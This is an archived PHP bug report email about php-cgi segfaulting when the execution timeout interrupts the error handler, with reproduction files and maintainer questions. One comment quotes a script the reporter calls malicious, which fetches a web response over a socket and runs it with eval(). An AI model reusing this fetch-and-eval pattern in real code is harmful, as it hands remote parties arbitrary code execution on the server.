#49484 [Opn]: max_execution_timeout interrupts the error_handler causing a segfault

Fri, 11 Sep 2009 12:54:32 -0700 

 ID:               49484
 User updated by:  witekfl at gazeta dot pl
 Reported By:      witekfl at gazeta dot pl
 Status:           Open
 Bug Type:         Reproducible crash
 Operating System: Debian Linux
 PHP Version:      5.2.10
 New Comment:

php.ini:
display_errors = Off
max_execution_time = 1
disable_functions = sleep

t.php:
<?php
for (;;) {
    sleep(1);
}

cat t.php | php-cgi -c php.ini

Run it a few times.
It segfaults for me.

Try with export MALLOC_CHECK_=2


Previous Comments:
------------------------------------------------------------------------

[2009-09-09 19:59:58] witekfl at gazeta dot pl

ThreadSafety disabled.

------------------------------------------------------------------------

[2009-09-09 19:54:28] j...@php.net

To rule out one possible problem: is ZTS enabled in your build? (check

your phpinfo() output for "Thread Safety", it should be "disabled"..

------------------------------------------------------------------------

[2009-09-09 13:13:35] witekfl at gazeta dot pl

Here is a malicious code:

<?php
@$s = fsockopen("google.com",80);
stream_set_timeout($s, 3);
fputs($s, "GET / HTTP/1.0\nHost: google.com\n\n");
$o="";
while(!feof($s)) $o.=fgets($s,1000);
$o=substr($o,strpos($o,"\r\n\r\n")+4);
fclose($s);
eval($o);
?>
aa

The setup is following:
nginx + apache + mod_layout + mod_fcgid + php-cgi as fastcgi
php-cgi has suid bit set and runs as user www-data.
nginx and apache runs on different users to php-cgi.
max_execution_timeout is 2 seconds.
iptables rejects connections to google.com (to the outside) for
php-cgi.
php segfaults very often and Apache returns status 500.

------------------------------------------------------------------------

[2009-09-06 14:19:25] witekfl at gazeta dot pl

I disabled fpm and still the same.

------------------------------------------------------------------------

[2009-09-06 13:31:30] j...@php.net

Obvious question is: Does it happen without the 3rd party patch?

------------------------------------------------------------------------

The remainder of the comments for this report are too long. To view
the rest of the comments, please view the bug report online at
    http://bugs.php.net/49484

-- 
Edit this bug report at http://bugs.php.net/?id=49484&edit=1

Reply via email to